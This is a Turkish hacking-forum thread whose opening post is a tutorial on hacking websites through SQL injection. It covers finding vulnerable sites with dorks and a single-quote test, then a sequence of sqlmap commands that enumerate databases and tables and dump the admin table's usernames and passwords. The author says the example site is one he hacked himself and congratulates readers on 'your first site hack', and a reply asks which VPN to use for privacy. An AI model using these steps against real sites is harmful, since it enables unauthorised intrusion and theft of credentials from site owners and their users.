İPUCU

Siber Güvenlik Siber Güvenlik ile alakalı araçların kullanımı, bilgi paylaşımı ve siber güvenlik eğitimi ile ilgili kaynakların paylaşıldığı alanımızdır.

Seçenekler

SQL-map ile açıklı site bulma Hackleme

sah mat - ait Kullanıcı Resmi (Avatar)
Junior Pentester
Üyelik tarihi:
03/2019
Mesajlar:
99
Konular:
17
Teşekkür (Etti):
59
Teşekkür (Aldı):
25
Ticaret:
(0) %
19-03-2019 04:00
#1
SQL-map ile açıklı site bulma Hackleme
Hepinize Merhaba değerli AS ve ÜSTLERİM
Forumda cevabına tam rastlayamadığım sql açıklı site veri tabanına sızma basit bir şekilde söylemek gerekirse site hackleme konusana değneceğim
----------------------------------------
SQL NEDİR:Structured Query Language
Türkçe karşılığı iseYapılandırılmış sorgu dilidir
----------------------------------------
Genelde Forumu yeni keşif eden arkadaşlarımızın sorduğu soru şu site nasıl hacklerim bir site hacklemenin birden fazla yolu vardır ama bu göstereceğim yöntem kolaylarından olup basit bi site hacleseniz dahi size özgüven katacak bir yoldur
Tabi bir site hackleyerek hacker olunmadığını hepimiz bilmekteyiz
-------------------------------------------
Gelelim sql açıklı bir site nasıl hacklenir öncelikle konularımda ATSCAN kullanımı adlı sql açıklı site taraması yapan bir program var buraya gelmeden oraya bir göz atın isterseniz kafanız karışmasın
-------------------------------------------
Ben size sql açığını bulup kendim hacklediğim bir siteden örnek vericem
Başlayalım

Sitemiz Bu
Peki ama açık olup olmadığı nasıl anlıyacağız

Sitenin dorklarınını denedikten sonra yapanız gereken şey
sadece basit bir (TIRNAK) (') işareti koymak olucaktır
----------------------------------------------
Sitemizi bulduk peki nasıl sızabiliriz
KOD:sqlmap -u siteadresi.com/php?id=9 --dbs

-u =Erişmek istediğimiz site adresi
--dbs=sitede hangi konuma erişmek istediğiniz
php?id=9ise sitede sql açığı bulunan dizin
ENTER YAPALIM
----------------------------------------------

Yukarıda gördüğümüz gibi bize sitenin şemalarını sundu
Şimdi ise siteninde dosyalarının içinde bulunduğu şemanın içerisine girmek

KOD:sqlmap -u siteadresi.com/php?id=9 -D fpsausmysqldb --tables
Gördüğünüz gibi bize admin panelinin de bulunduğu 9 kolonlu bir şema verdi
-----------------------------------------------
Yapmamız gereken son adımlardan biri ADMİN paneline erişip password ve kullanıcı adını almak olucak

KOD:sqlmap -u siteadresi.com/php?id=9 -D fpsausmysqldb -T admin --column
Resimde gördüğünüz gibi pass ve uname adlı klasörleimiz var
------------------------------------------------
Ve son olarakta bunları öğrenmeye gelelim
KOD:sqlmap -u siteadresi.com/php?id=9 -D fpsausmysqldb -T admin -C pass,uname --dump
dedikten sonra bize aşağıda şifre ve kullanıcı adını vericektir

HAYIRLI OLSUN İLK SİTENİZİ HACKLEDİNİZ DAHA YOLUNUZ ÇOK UZUN
SAYGILARIMLA ŞahMat
---------------------
ARAMIZDAKİ EN KIDEMLİ DERBEDERE
ŞahMat
Konu sah mat tarafından (19-03-2019 11:15 Saat 11:15 ) değiştirilmiştir.
cakr1805 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2015
Mesajlar:
585
Konular:
37
Teşekkür (Etti):
70
Teşekkür (Aldı):
68
Ticaret:
(0) %
19-03-2019 05:01
#2
https://www.turkhackteam.org/web-ser...teran-7-a.html
Bunun için sabitlenmiş bir konu zaten bulunmakta konu açmadan önce daha dikkatli olun.
Bu arada CMD ile kali de sql map aynı şekilde çalışır
kadir2019 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2019
Mesajlar:
266
Konular:
134
Teşekkür (Etti):
6
Teşekkür (Aldı):
2
Ticaret:
(0) %
19-03-2019 09:37
#3
Peki gizliliğimiz için hangi VPN lazım?
sah mat - ait Kullanıcı Resmi (Avatar)
Junior Pentester
Üyelik tarihi:
03/2019
Mesajlar:
99
Konular:
17
Teşekkür (Etti):
59
Teşekkür (Aldı):
25
Ticaret:
(0) %
19-03-2019 11:17
#4
Açılan koyunu görmemişim kusura bakmayın ama resimli anlatım olduğu için anlaşılır olduğunu düşünmekteyim
---------------------
ARAMIZDAKİ EN KIDEMLİ DERBEDERE
ŞahMat

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı